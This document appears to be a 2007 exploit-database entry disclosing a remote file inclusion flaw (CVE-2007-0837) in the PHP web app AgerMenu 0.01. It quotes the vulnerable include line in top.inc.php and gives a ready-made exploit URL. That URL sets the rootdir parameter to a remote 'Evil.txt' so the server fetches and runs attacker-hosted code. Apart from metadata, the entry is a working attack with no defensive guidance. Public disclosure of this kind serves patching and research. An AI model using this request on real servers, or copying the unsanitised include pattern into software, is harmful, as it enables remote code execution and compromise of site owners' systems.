[] NeoSense

AgerMenu 0.01 - 'top.inc.php?rootdir' Remote File Inclusion

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-02-06 
date_updated:  
verified: 1 
codes: OSVDB-33681;CVE-2007-0837 
tags: 
aliases:  
screenshot_url:  
application_url: 

===============================================================
Discovered by GolD_M(Mahmnood_ali) & &  Contact: HackEr_@W.Cn
===============================================================
URL Script: http://www.chbs.dk/proj/agermenu/agermenu-0.01.tgz
===============================================================
V.CODE: In : [path]/example/inc/top.inc.php
include $rootdir."inc/agermenu.func.php";
===============================================================
Exploit: v.Cc/[path]/example/inc/top.inc.php?rootdir=Evil.txt?
===============================================================

# milw0rm.com [2007-02-07]